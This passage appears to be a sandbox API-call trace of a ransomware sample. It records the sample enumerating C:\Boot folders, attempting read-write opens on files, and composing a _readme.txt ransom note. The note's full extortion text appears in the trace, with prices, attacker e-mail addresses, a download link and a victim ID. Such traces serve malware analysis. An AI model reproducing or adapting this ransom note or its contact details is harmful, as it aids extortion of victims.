hHeap=0xcd0000) returned 1 [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.059] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.060] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.060] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0166.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.060] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0166.060] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0166.061] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.061] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.061] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.061] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.062] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0166.062] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.062] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.062] PathFindFileNameW (pszPath="") returned="" [0166.062] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.063] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.063] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.063] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.063] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0166.063] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0166.063] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.063] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.063] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0166.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.064] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.064] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.064] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.064] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0166.064] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0166.064] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.064] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.064] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.064] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.064] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.064] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.064] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.064] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.064] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.064] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.064] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.065] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.065] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.066] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.067] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.067] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.067] HeapFree (in: hHeap=0xcd0000, 